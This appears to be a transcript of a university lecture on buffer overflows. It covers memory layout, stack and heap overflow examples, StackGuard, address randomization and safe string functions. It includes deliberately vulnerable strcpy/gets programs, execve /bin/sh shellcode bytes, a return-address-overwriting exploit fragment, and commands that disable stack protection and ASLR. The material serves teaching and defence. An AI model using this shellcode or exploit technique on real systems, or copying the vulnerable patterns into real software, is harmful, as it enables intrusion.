lecture: buffer overflow - iowa state universityhome.eng.iastate.edu/~othmanel/files/cpre562/lecture...
TRANSCRIPT
Lecture: Buffer Overflow
Lotfi ben Othmane
• What is a buffer overflow?• How to exploit a buffer overflow?• What are the mitigation techniques?• How to detect a buffer overflow?
2
Plan
3
Memory Layout
Stack
Heap / BSS Segment / Data Segment / Text Segment / Low address
High address
#include<string.h>#include<stdio.h>#include <stdlib.h>
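int x = 100; /* initialised global: lives in the data segment */

/*
 * Example1.c: one variable of each storage class, so their addresses can
 * be compared against the memory-layout slide. Changes relative to the
 * slide: the malloc result is no longer cast (unnecessary in C) and is
 * checked before use, the size is taken from the object, and the exit
 * status is EXIT_SUCCESS instead of 1 (which a shell reads as failure).
 * Returns EXIT_SUCCESS, or EXIT_FAILURE if the heap allocation fails.
 */
int main(void)
{
    /* automatic variables: stack */
    int a = 2;
    float b = 2.5;
    /* static, zero-initialised: BSS segment */
    static int y;
    /* two ints on the heap; sizeof *ptr keeps the size tied to the type */
    int *ptr = malloc(2 * sizeof *ptr);
    if (ptr == NULL) {
        return EXIT_FAILURE;
    }
    ptr[0] = 5;
    ptr[1] = 6;
    /* release the heap block and drop the dangling pointer */
    free(ptr);
    ptr = NULL;
    return EXIT_SUCCESS;
}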
Memory Layout
Example1.c
• x is at 0x804a01c content 100
• a is at 0xbff21cd4 content 2
• b is at 0xbff21cd8 content 2.500000
• y is at 0x804a028 content 0
• ptr is at 0xbff21cdc, content 0x8f64008
• ptr is at 0x8f64008, content 5
• ptr is at 0x8f6400c, content 6
5
Memory Layout
Data segment
Stack
BSS segment
Heap
#include<string.h>#include<stdio.h>#include <stdlib.h>
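int x = 100; /* initialised global: lives in the data segment */

/*
 * Example1.c: one variable of each storage class, so their addresses can
 * be compared against the memory-layout slide. Changes relative to the
 * slide: the malloc result is no longer cast (unnecessary in C) and is
 * checked before use, the size is taken from the object, and the exit
 * status is EXIT_SUCCESS instead of 1 (which a shell reads as failure).
 * Returns EXIT_SUCCESS, or EXIT_FAILURE if the heap allocation fails.
 */
int main(void)
{
    /* automatic variables: stack */
    int a = 2;
    float b = 2.5;
    /* static, zero-initialised: BSS segment */
    static int y;
    /* two ints on the heap; sizeof *ptr keeps the size tied to the type */
    int *ptr = malloc(2 * sizeof *ptr);
    if (ptr == NULL) {
        return EXIT_FAILURE;
    }
    ptr[0] = 5;
    ptr[1] = 6;
    /* release the heap block and drop the dangling pointer */
    free(ptr);
    ptr = NULL;
    return EXIT_SUCCESS;
}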
Stack
/*
 * Example2.c: a deliberate stack-based overflow. The 33-character literal
 * plus its NUL is 34 bytes; strcpy stops at that NUL, not at the end of
 * the 12-byte destination, so 22 bytes are written past buffer into
 * neighbouring stack data -- undefined behaviour. With the compiler's
 * stack protector enabled this is what triggers "stack smashing detected"
 * on the next slide. The bounded alternative is
 * snprintf(buffer, sizeof buffer, "%s", str), which truncates instead.
 */
int main(){
    /* declared before buffer; the following slides ask where it lands */
    char buffer2[50];
    /* 12-byte destination */
    char buffer[12];
    /* 34 bytes including the terminator */
    char *str ="This is definitely longer than 12";
    /* unbounded copy: the overflow happens here */
    strcpy(buffer, str);
    return 1;
}
6
Simple Buffer Overflow
What is the content of buffer?
What is the content of buffer 2?
Example2.c
Buffer overflow – more data is copied into the destination buffer than the size of the space allocated for it.
7
Buffer Overflow
8
Simple Buffer Overflow
/*
 * Example2.c: a deliberate stack-based overflow. The 33-character literal
 * plus its NUL is 34 bytes; strcpy stops at that NUL, not at the end of
 * the 12-byte destination, so 22 bytes are written past buffer into
 * neighbouring stack data -- undefined behaviour. With the compiler's
 * stack protector enabled this is what triggers "stack smashing detected"
 * on the next slide. The bounded alternative is
 * snprintf(buffer, sizeof buffer, "%s", str), which truncates instead.
 */
int main(){
    /* declared before buffer; the following slides ask where it lands */
    char buffer2[50];
    /* 12-byte destination */
    char buffer[12];
    /* 34 bytes including the terminator */
    char *str ="This is definitely longer than 12";
    /* unbounded copy: the overflow happens here */
    strcpy(buffer, str);
    return 1;
}
9
Simple Buffer Overflow
Example2.c
*** stack smashing detected ***
Stackguard: mechanism to detect changes to specific data stored in the stack
Disable: gcc [filename.c] -fno-stack-protector
10
Protection Mechanism 1 - Stackguard
11
Protection Mechanism - Stackguard
Return Address
Buffer[11]
Guard
….Buffer[0]
Set the guardmovl %gs:20, %eaxmovl %eax, -12(%ebp)xorl %eax, %eax
Check the guardmovl -12(%ebp), %eaxxorl %gs:20, %eaxJe .L2Call _stack_chk_fail
Code inserted by compiler
/*
 * Example2.c with the two buffers declared in the opposite order. The copy
 * is the same: 34 bytes (33 characters plus NUL) into a 12-byte buffer,
 * 22 bytes past its end -- undefined behaviour regardless of which
 * neighbour the excess lands on, since the compiler gives no guarantee
 * that stack slots follow declaration order. The slide's question
 * ("can we still have the overflow?") is not answered here; the fix in
 * either ordering is a bounded copy such as
 * snprintf(buffer, sizeof buffer, "%s", str).
 */
int main(){
    /* 12-byte destination, now declared first */
    char buffer[12];
    char buffer2[50];
    /* 34 bytes including the terminator */
    char *str ="This is definitely longer than 12";
    /* unbounded copy: the overflow happens here */
    strcpy(buffer, str);
    return 1;
}
12
Simple Buffer Overflow
What is the content of buffer?
What is the content of buffer 2?
Let’s change the order of buffer and buffer 2. Can we still have the overflow?
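/*
 * Example3.c, hardened. The slide's version allocated one byte for each of
 * input and secret, copied "Password" (9 bytes with its NUL) into secret,
 * read input with an unbounded scanf("%s"), compared with strcnmp (a typo
 * for strncmp), never checked the allocations, and lacked main's closing
 * brace. Both heap blocks overflowed. Here each buffer is sized for its
 * content, the read is bounded, allocations are checked and released, and
 * the comparison is a full strcmp.
 * Returns EXIT_SUCCESS when the entered password matches, EXIT_FAILURE
 * otherwise (including allocation or read failure).
 */
int main(void)
{
    int rc = EXIT_FAILURE;
    enum { INPUT_MAX = 64 };            /* must match the %63s width below */
    char *input = malloc(INPUT_MAX);
    char *secret = malloc(sizeof "Password"); /* literal size includes NUL */
    if (input == NULL || secret == NULL) {
        goto out;
    }
    strcpy(secret, "Password");        /* fits: sized from the same literal */
    printf("Enter password");
    fflush(stdout);                     /* make the prompt visible before blocking */
    /* %63s reads at most INPUT_MAX - 1 characters, leaving room for the NUL */
    if (scanf("%63s", input) != 1) {
        goto out;
    }
    if (strcmp(input, secret) == 0) {
        printf("Access granted");
        rc = EXIT_SUCCESS;
    } else {
        printf("Access Denied");
    }
out:
    free(input);
    free(secret);
    return rc;
}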
13
Heap-based Buffer Overflow
Example3.c
Can we get access without entering the correct password?
/* Example4.c (fragment; the enclosing function is not shown). */
char buff[10];
/* Set only by the success branch below; lives next to the two buffers. */
int pass = 0;
char secret[10];
/* 8 characters plus NUL = 9 bytes: fits in the 10-byte buff. */
strcpy(buff,"Password");
printf("\n Enter your password: ");
/* gets() takes no length, so any line longer than 9 characters is written
 * past secret into neighbouring stack data (the slide asks what that does
 * to pass). gets() was removed from the language in C11; the bounded
 * replacement is fgets(secret, sizeof secret, stdin). */
gets(secret);
if(strcmp(secret, buff))
{ printf ("\n Wrong Password \n");}else
{printf ("\n Correct Password \n");pass = 1; }
/* Privilege is granted on the value of pass, not on the comparison itself. */
if(pass)printf ("\n Root privileges given to the user \n");
14
So What?
Example4.c
Can we get access without entering the correct password?
How can we better use the weakness?
15
Uses of Buffer Overflow
/*
 * Copies str into a fixed 24-byte stack buffer with strcpy, which stops
 * only at the NUL of str: any argument of 24 or more characters is written
 * past buffer into the rest of the frame (saved frame pointer and return
 * address, per the layout slide). This is the defect the later slides
 * build on; the fix is a bounded copy, e.g.
 * snprintf(buffer, sizeof buffer, "%s", str), together with validation
 * of the caller's data. Always returns 1.
 */
int bof(char *str){
    char buffer[24];
    /* unbounded copy: the overflow happens here */
    strcpy(buffer, str);
    return 1;
}
16
Stack Memory Layout
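/*
 * stack.c driver: reads up to 517 bytes from "badfile" and hands them to
 * bof(). Defects fixed relative to the slide: fopen() was never checked
 * (NULL dereference in fread), the fread() count was ignored, the file was
 * never closed, and str was never NUL-terminated -- a full 517-byte file
 * left strcpy() in bof() with no terminator at all. The array is one byte
 * larger than the read so the terminator always fits. bof() (not shown
 * here) still copies without a bound; this function only makes its input
 * well-formed.
 * Returns 0 on success, 1 if "badfile" cannot be opened.
 */
int main(int argc, char **argv)
{
    char str[517 + 1];
    (void)argc;
    (void)argv;
    FILE *badfile = fopen("badfile", "r");
    if (badfile == NULL) {
        perror("badfile");
        return 1;
    }
    size_t n = fread(str, sizeof(char), 517, badfile);
    fclose(badfile);
    str[n] = '\0';   /* n <= 517, so this index is always in bounds */
    bof(str);
    printf("Returned Properly\n");
    return 0;
}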
stack.c
/*
 * Copies str into a fixed 24-byte stack buffer with strcpy, which stops
 * only at the NUL of str: any argument of 24 or more characters is written
 * past buffer into the rest of the frame (saved frame pointer and return
 * address, per the layout slide). This is the defect the later slides
 * build on; the fix is a bounded copy, e.g.
 * snprintf(buffer, sizeof buffer, "%s", str), together with validation
 * of the caller's data. Always returns 1.
 */
int bof(char *str){
    char buffer[24];
    /* unbounded copy: the overflow happens here */
    strcpy(buffer, str);
    return 1;
}
17
Stack Memory Layout
value of *str
Return Address
Previous Frame pointer
Value of buffer
Current framepointer
Arguments
Local variables
High address
Low address
18
Stack Buffer Overflow
/*
 * Copies str into a fixed 24-byte stack buffer with strcpy, which stops
 * only at the NUL of str: any argument of 24 or more characters is written
 * past buffer into the rest of the frame (saved frame pointer and return
 * address, per the layout slide). This is the defect the later slides
 * build on; the fix is a bounded copy, e.g.
 * snprintf(buffer, sizeof buffer, "%s", str), together with validation
 * of the caller's data. Always returns 1.
 */
int bof(char *str){
    char buffer[24];
    /* unbounded copy: the overflow happens here */
    strcpy(buffer, str);
    return 1;
}
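/*
 * stack.c driver: reads up to 517 bytes from "badfile" and hands them to
 * bof(). Defects fixed relative to the slide: fopen() was never checked
 * (NULL dereference in fread), the fread() count was ignored, the file was
 * never closed, and str was never NUL-terminated -- a full 517-byte file
 * left strcpy() in bof() with no terminator at all. The array is one byte
 * larger than the read so the terminator always fits. bof() (not shown
 * here) still copies without a bound; this function only makes its input
 * well-formed.
 * Returns 0 on success, 1 if "badfile" cannot be opened.
 */
int main(int argc, char **argv)
{
    char str[517 + 1];
    (void)argc;
    (void)argv;
    FILE *badfile = fopen("badfile", "r");
    if (badfile == NULL) {
        perror("badfile");
        return 1;
    }
    size_t n = fread(str, sizeof(char), 517, badfile);
    fclose(badfile);
    str[n] = '\0';   /* n <= 517, so this index is always in bounds */
    bof(str);
    printf("Returned Properly\n");
    return 0;
}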
Example5.c
Can we have code in “badfile”?
/* Source form of the payload shown as bytes on the next slide: it replaces
 * the running program with /bin/sh via execve. As printed it is not valid
 * C (the include line lacks angle brackets and main must return int); it
 * is here to show what the byte string encodes, not to be built. */
#include stdio.h
void main() {
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
}
19
Exploit - Shell Code
“\x31\xc0" /* xorl %eax,%eax */"\x50" /* pushl %eax */"\x68""//sh" /* pushl $0x68732f2f */"\x68""/bin" /* pushl $0x6e69622f */"\x89\xe3" /* movl %esp,%ebx */"\x50" /* pushl %eax */"\x53" /* pushl %ebx */"\x89\xe1" /* movl %esp,%ecx */"\x99" /* cdql */"\xb0\x0b" /* movb $0x0b,%al */"\xcd\x80" /* int $0x80 */
20
Shell Exploit
/*
 * Copies str into a fixed 24-byte stack buffer with strcpy, which stops
 * only at the NUL of str: any argument of 24 or more characters is written
 * past buffer into the rest of the frame (saved frame pointer and return
 * address, per the layout slide). This is the defect the later slides
 * build on; the fix is a bounded copy, e.g.
 * snprintf(buffer, sizeof buffer, "%s", str), together with validation
 * of the caller's data. Always returns 1.
 */
int bof(char *str){
    char buffer[24];
    /* unbounded copy: the overflow happens here */
    strcpy(buffer, str);
    return 1;
}
21
Stack Memory Layout for Functions
Exploit
Return Address
Previous Frame pointer
Value of bufferCurrent framepointer
Arguments
Local variables
High address
Low address
Can we change the return address?
2222
Exploit
Return Address
Previous Frame pointer
Value of bufferCurrent framepointer
Arguments
Local variables
High address
Low address
Stack Memory Layout for Functions
23
Stack Overflow
/*
 * Intended to hand the caller the current frame pointer: the inline asm
 * copies %ebp into %eax and the function then falls off its end with no
 * C return statement, relying on %eax being the i386 return register.
 * That is 32-bit x86 only and undefined behaviour in standard C; the
 * supported equivalent on gcc/clang is __builtin_frame_address(0).
 */
void* readaddress(){
    asm("movl %ebp, %eax");
}
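/*
 * Prints the address of a local buffer and the frame pointer reported by
 * readaddress() (defined elsewhere in this file) so the two can be
 * compared on the layout slide. str is unused. Fix relative to the slide:
 * %p requires a void *, and &buffer has type char (*)[24], so the argument
 * is converted explicitly (same address, correct type). Always returns 1.
 */
int bof(char *str){
    char buffer[24];
    (void)str;
    printf("\n Address of buffer %p", (void *)buffer);
    printf("\n Ebp %p", readaddress());
    return 1;
}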
Example5.c
/* Exploit_final.c (fragment; the declarations and enclosing function are
 * not shown). The hard-coded absolute stack address is the assumption
 * that address randomization (Protection 2, later in the lecture) is
 * designed to break: with randomization on, this constant is wrong on
 * every run. */
addr = 0xbffff148 + offset;
ptr = buffer;
addr_ptr = (long*)(ptr);
for (i = 0; i < 10; i++)
    *(addr_ptr++) = addr;
memcpy(buffer + sizeof(buffer) - sizeof(shellcode), shellcode, sizeof(shellcode));
24
Final Exploit
Exploit_final.c
25
Stack Overflow
/*
 * Copies str into a fixed 24-byte stack buffer with strcpy, which stops
 * only at the NUL of str: any argument of 24 or more characters is written
 * past buffer into the rest of the frame (saved frame pointer and return
 * address, per the layout slide). This is the defect the later slides
 * build on; the fix is a bounded copy, e.g.
 * snprintf(buffer, sizeof buffer, "%s", str), together with validation
 * of the caller's data. Always returns 1.
 */
int bof(char *str){
    char buffer[24];
    /* unbounded copy: the overflow happens here */
    strcpy(buffer, str);
    return 1;
}
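/*
 * stack.c driver: reads up to 517 bytes from "badfile" and hands them to
 * bof(). Defects fixed relative to the slide: fopen() was never checked
 * (NULL dereference in fread), the fread() count was ignored, the file was
 * never closed, and str was never NUL-terminated -- a full 517-byte file
 * left strcpy() in bof() with no terminator at all. The array is one byte
 * larger than the read so the terminator always fits. bof() (not shown
 * here) still copies without a bound; this function only makes its input
 * well-formed.
 * Returns 0 on success, 1 if "badfile" cannot be opened.
 */
int main(int argc, char **argv)
{
    char str[517 + 1];
    (void)argc;
    (void)argv;
    FILE *badfile = fopen("badfile", "r");
    if (badfile == NULL) {
        perror("badfile");
        return 1;
    }
    size_t n = fread(str, sizeof(char), 517, badfile);
    fclose(badfile);
    str[n] = '\0';   /* n <= 517, so this index is always in bounds */
    bof(str);
    printf("Returned Properly\n");
    return 0;
}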
stack.c
Are we ready?
Perform the attack
We observe that the program does not display: Returned Properly
26
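/*
 * Resolves the host name of a user-supplied IPv4 address into a local
 * buffer. Defects fixed relative to the slide: addr was declared as a
 * pointer but assigned the in_addr_t value returned by inet_addr(); the
 * inet_addr() failure value (INADDR_NONE) was not checked; the result of
 * gethostbyaddr() was dereferenced without a NULL check; and hp->h_name
 * was copied with strcpy into a 64-byte buffer, so a name of 64 or more
 * characters overflowed hostname. The copy is now bounded and a name that
 * does not fit is discarded rather than silently truncated. The
 * prototype of inet_addr comes from <arpa/inet.h> instead of a local
 * redeclaration. validate_addr_form() is defined elsewhere and is called
 * as before. Returns nothing; on any failure hostname is left empty.
 */
void host_lookup(char *user_supplied_addr)
{
    struct hostent *hp;
    in_addr_t addr;
    char hostname[64];

    validate_addr_form(user_supplied_addr);
    addr = inet_addr(user_supplied_addr);
    if (addr == INADDR_NONE) {
        return; /* not a parseable dotted-quad address */
    }
    hp = gethostbyaddr(&addr, sizeof(struct in_addr), AF_INET);
    if (hp == NULL || hp->h_name == NULL) {
        return; /* no reverse mapping; the slide dereferenced hp here */
    }
    /* bounded copy: snprintf always NUL-terminates and reports the full length */
    int n = snprintf(hostname, sizeof hostname, "%s", hp->h_name);
    if (n < 0 || (size_t)n >= sizeof hostname) {
        hostname[0] = '\0'; /* too long to be trusted as-is: discard it */
        return;
    }
    (void)hostname; /* the slide's fragment ends here; hostname is ready for use */
}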
27
Buffer Overflow in the Real World
Buffer overflows have played a major role in attacks such as: • Morris worm of 1988 • Code Red worm of 2001 • Etc.
28
So
• Randomize the memory space of the key data area• Text segment• Stack• Heap• Data segment
• Disable randomization: sudo sysctl -w kernel.randomize_va_space=0 (the value 2 enables randomization)
29
Protection 2 - Address Randomization
• x is at 0x804a01c content 100
• a is at 0xbff21cd4 content 2
• b is at 0xbff21cd8 content 2.500000
• y is at 0x804a028 content 0
• ptr is at 0xbff21cdc, content 0x8f64008
• ptr is at 0x8f64008, content 5
• ptr is at 0x8f6400c, content 6
30
Protection 2 - Address Randomization
Data segment
Stack
BSS segment
Heap
The number of possibilities is limited and could be guessed in a few minutes
• There are bounded variants of the memory management and string functions
• E.g., use strncpy(destination, source, size); note that strncpy does not NUL-terminate the destination when the source is too long, so snprintf(destination, size, "%s", source) is the safer choice
31
Protection 3 – Defensive Functions
32
Protection 4 – Detect Vulnerabilities Using Code Analysis
From the TrueCrypt report, page 32
Code analysis: Ensure that boundaries are checked before copying
Arms race – attackers keep bypassing protection mechanisms
33
Buffer Overflow Detection
Arada Locomate – V2V Device
34
Arada Locomate – V2V DeviceBuffer overflow hypothesis at read()
35
Thank you
Any Question?
36